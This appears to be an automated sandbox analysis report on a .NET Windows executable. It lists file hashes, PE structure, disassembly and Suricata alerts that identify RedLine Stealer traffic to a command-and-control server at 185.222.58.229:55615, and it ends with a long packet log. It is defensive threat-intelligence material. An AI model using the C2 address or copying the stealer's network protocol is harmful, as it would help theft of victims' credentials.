                                                                                                                                                SHA512:dcb386b1c12f993e62376949cbe6437ffbc3c44c3c572c6c1da38bad00778caa22946538e685b2e2eff49cc87a139ae385db88ca39a963d84c58db2031880cff
                                                                                                                                                SSDEEP:12288:d2sv+SGjpA3yKUUo6aYqcpeLWMynFE9gjuozkBfe3bnFtA6E2Y09dCvzCnYb+iX:d2xjCqyQCFPjuSv3hC6E3090LCnYn
                                                                                                                                                TLSH:85E40164169ED806C4D30B744973E2B957748DCEFD16C70B9BDA7EEF382B25628803A1
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0...... ........... ........@.. ....................................@................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:1bb3b3b3b3d389b3

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x4ab8b2
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x6747D6B4 [Thu Nov 28 02:34:28 2024 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                adc dword ptr [eax], eax
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [esi], bh
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax+00h], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                push edi
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [ebp+00h], bl
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                pop edi
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [edx+00h], ah
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [esi], cl
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [edi], bl
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [edx], ch
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax+eax+00h], dl
                                                                                                                                                add byte ptr [ebx+00h], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                pop ebx
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax+eax+00h], ah
                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax+eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                or dword ptr [eax], eax
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                adc eax, 1C000000h
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [ebx], dh
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [edi+00h], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                push eax
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [edi], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [edx], ah
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [ebx], dl
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax+eax], bh
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                sbb byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                dec ecx
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [ebx+00h], cl
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                dec edi
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xab8600x4f.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x1c34.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x20000xa99380xa9a00bac8a1e7bc489f2e0005570bdabf4928False0.9085240880619012OpenPGP Secret Key7.7812990489221505IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0xac0000x1c340x1e0038d97f655cb85553542aac2f2dfac9f8False0.735546875data7.1384386010133545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0xae0000xc0x200bed2e9ae42d85a05c94d082240b829afFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_ICON0xac1600x151aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8863383931877082
                                                                                                                                                RT_GROUP_ICON0xad67c0x14data0.9
                                                                                                                                                RT_GROUP_ICON0xad6900x14data1.05
                                                                                                                                                RT_VERSION0xad6a40x3a4data0.4356223175965665
                                                                                                                                                RT_MANIFEST0xada480x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-12-03T13:27:02.233306+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.449733185.222.58.22955615TCP
                                                                                                                                                2024-12-03T13:27:07.671218+01002045000ET MALWARE RedLine Stealer - CheckConnect Response1185.222.58.22955615192.168.2.449733TCP
                                                                                                                                                2024-12-03T13:27:08.330742+01002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.449733185.222.58.22955615TCP
                                                                                                                                                2024-12-03T13:27:12.660613+01002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound1185.222.58.22955615192.168.2.449733TCP
                                                                                                                                                2024-12-03T13:27:13.296696+01002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.449737185.222.58.22955615TCP
                                                                                                                                                2024-12-03T13:27:16.296702+01002848200ETPRO MALWARE RedLine - GetUpdates Request1192.168.2.449739185.222.58.22955615TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 3, 2024 13:27:00.775446892 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:00.896859884 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:00.896964073 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:00.911386967 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:01.031485081 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:01.264681101 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:01.385394096 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:02.182149887 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:02.233305931 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:02.425539017 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:02.467581987 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:07.551135063 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:07.671217918 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:07.905309916 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:07.951133013 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:08.003767014 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:08.026439905 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:08.330627918 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:08.330652952 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:08.330666065 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:08.330677032 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:08.330688953 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:08.330741882 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:08.373940945 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:08.407663107 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:08.407725096 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:08.407788992 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:08.411685944 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:08.451945066 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:12.540045977 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:12.540560007 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:12.660613060 CET5561549733185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:12.660650015 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:12.660723925 CET4973355615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:12.661187887 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:12.661587954 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:12.782105923 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.014784098 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.135564089 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.135579109 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.135597944 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.135606050 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.135623932 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.135632038 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.135637999 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.135677099 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.135709047 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.135710955 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.135720968 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.135757923 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.135792017 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.135971069 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.136023998 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.255831957 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.255848885 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.255867004 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.255875111 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.255907059 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.255914927 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.255947113 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.255959034 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.296600103 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.296695948 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.416506052 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.416630983 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.460457087 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.460514069 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.580476999 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.580563068 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.627851963 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.628011942 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.700598955 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.700664043 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748239040 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748262882 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748271942 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748280048 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748291969 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748318911 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748331070 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748372078 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748388052 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748405933 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748476982 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748486996 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748497009 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748534918 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748543024 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748568058 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748584986 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748603106 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748611927 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748658895 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748675108 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748728991 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748755932 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748872042 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.748918056 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.748975992 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749020100 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.749021053 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749106884 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749155998 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.749181986 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749206066 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749257088 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.749267101 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749309063 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.749378920 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749489069 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749526024 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.749541998 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.749552011 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749567986 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749630928 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749670029 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.749674082 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749689102 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.749753952 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.749932051 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749953985 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749962091 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.749973059 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.749990940 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.750021935 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.750046015 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.750088930 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.820794106 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.821670055 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.868621111 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.868706942 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869149923 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869221926 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869338989 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869349003 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869358063 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869376898 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869385004 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869396925 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869400024 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869415998 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869426012 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869446993 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869477987 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869525909 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869535923 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869549036 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869559050 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869569063 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869573116 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869591951 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869595051 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869620085 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869647980 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869649887 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869659901 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869690895 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869786024 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869796038 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869805098 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869822025 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869831085 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869832993 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869862080 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869882107 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.869891882 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869901896 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.869971037 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870009899 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870028973 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870054960 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870055914 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870064974 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870075941 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870094061 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870110035 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870126963 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870136023 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870176077 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870208979 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870244980 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870253086 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870338917 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870368958 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870378971 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870414972 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870415926 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870424032 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870460033 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870503902 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870513916 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870527983 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870556116 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870568991 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870572090 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870589018 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870615959 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870618105 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870626926 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870656013 CET4973755615192.168.2.4185.222.58.229
